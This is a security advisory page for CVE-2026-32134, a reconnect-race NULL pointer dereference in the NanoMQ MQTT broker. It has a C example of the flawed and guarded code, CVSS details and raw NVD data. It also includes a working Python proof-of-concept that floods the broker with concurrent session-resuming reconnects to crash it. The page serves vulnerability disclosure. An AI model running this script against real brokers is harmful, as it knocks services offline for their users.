Security Vulnerability Report
CVE-2026-32134 CVSS 5.9 MEDIUM

CVE-2026-32134

Published: 2026-05-19 18:16:21
Last Modified: 2026-05-19 21:08:09

Description

NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport's p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11.
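The dereference pattern described above, shown next to a guarded form. This is an added example, not NanoNNG's code and not the upstream patch; the struct layouts and the names `pipe_drop_subs`, `restore_unchecked`, `restore_checked` and `make_pipe` are hypothetical, and the sample data is constructed.

```c
#include <stdlib.h>
/* Hypothetical stand-ins modeled on the description; not NanoNNG's types. */
struct subinfo    { int qos; struct subinfo *next; };
struct sub_list   { struct subinfo *head; };
struct pipe_state { struct sub_list *subinfol; size_t restored; };

/* Teardown: free the list and NULL the pointer, the state the race leaves behind. */
void pipe_drop_subs(struct pipe_state *p) {
    while (p->subinfol != NULL && p->subinfol->head != NULL) {
        struct subinfo *s = p->subinfol->head;
        p->subinfol->head = s->next;
        free(s);
    }
    free(p->subinfol);
    p->subinfol = NULL;
}

/* Unguarded pattern: reads old->subinfol->head with no check, so NULL crashes. */
int restore_unchecked(struct pipe_state *new_pipe, const struct pipe_state *old) {
    for (struct subinfo *s = old->subinfol->head; s != NULL; s = s->next)
        new_pipe->restored++;
    return 0;
}

/* Guarded pattern: a missing list means "no session to restore", not a crash. */
int restore_checked(struct pipe_state *new_pipe, const struct pipe_state *old) {
    if (new_pipe == NULL || old == NULL || old->subinfol == NULL) return -1;
    for (struct subinfo *s = old->subinfol->head; s != NULL; s = s->next)
        new_pipe->restored++;
    return 0;
}

/* Build a constructed cached pipe holding n subscriptions (sample data). */
struct pipe_state make_pipe(size_t n) {
    struct pipe_state p = { calloc(1, sizeof(struct sub_list)), 0 };
    for (size_t i = 0; p.subinfol != NULL && i < n; i++) {
        struct subinfo *s = calloc(1, sizeof *s);
        if (s == NULL) break;
        s->next = p.subinfol->head;
        p.subinfol->head = s;
    }
    return p;
}

int main(void) {
    struct pipe_state old = make_pipe(3), fresh = { NULL, 0 };
    if (restore_checked(&fresh, &old) != 0) return 1;
    pipe_drop_subs(&old);  /* teardown ran first, as in the reconnect race */
    return restore_checked(&fresh, &old) == -1 ? 0 : 1;
}
```

In a concurrent broker the check has to run under the same lock the teardown path holds; otherwise the pointer can still be cleared between the check and the loop.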

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

NanoMQ <= 0.24.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import paho.mqtt.client as mqtt
import threading
import time

# Target configuration
TARGET_IP = "127.0.0.1"
TARGET_PORT = 1883
NUM_CLIENTS = 50  # High concurrency to trigger race condition


# Callback when connection is established
def on_connect(client, userdata, flags, rc):
    if rc == 0:
        print(f"Client {userdata} connected")
        # Simulate traffic or wait for disconnect
    else:
        print(f"Failed to connect, return code {rc}")


# Callback when connection is lost
def on_disconnect(client, userdata, rc):
    print(f"Client {userdata} disconnected")
    # Immediately attempt to reconnect to trigger race condition
    try:
        client.reconnect()
    except Exception as e:
        print(f"Reconnect error for {userdata}: {e}")


def start_mqtt_client(client_id):
    # clean_start=False (clean_session=False) is required to trigger session restoration logic
    client = mqtt.Client(client_id=client_id, clean_session=False)
    client.on_connect = on_connect
    client.on_disconnect = on_disconnect
    client.user_data_set(client_id)

    try:
        client.connect(TARGET_IP, TARGET_PORT, 60)
        client.loop_start()
        # Keep alive for a short duration then disconnect to start the cycle
        time.sleep(2)
        client.loop_stop()
        client.disconnect()
    except Exception as e:
        print(f"Error in client {client_id}: {e}")


if __name__ == "__main__":
    threads = []
    print(f"Starting attack against {TARGET_IP}:{TARGET_PORT}...")

    # Create multiple threads to simulate concurrent reconnections
    for i in range(NUM_CLIENTS):
        client_id = f"poc_client_{i}"
        t = threading.Thread(target=start_mqtt_client, args=(client_id,))
        t.start()
        threads.append(t)
        time.sleep(0.01)  # Slight delay to stagger connections

    for t in threads:
        t.join()

    print("Attack finished. Check if the broker has crashed.")
```

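References

https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb
https://github.com/nanomq/nanomq/issues/2241
https://github.com/nanomq/nanomq/releases/tag/0.24.11
https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2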

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32134", "sourceIdentifier": "[email protected]", "published": "2026-05-19T18:16:21.147", "lastModified": "2026-05-19T21:08:09.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport's p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/issues/2241", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/releases/tag/0.24.11", "source": "[email protected]"}, {"url": 
"https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/issues/2241", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}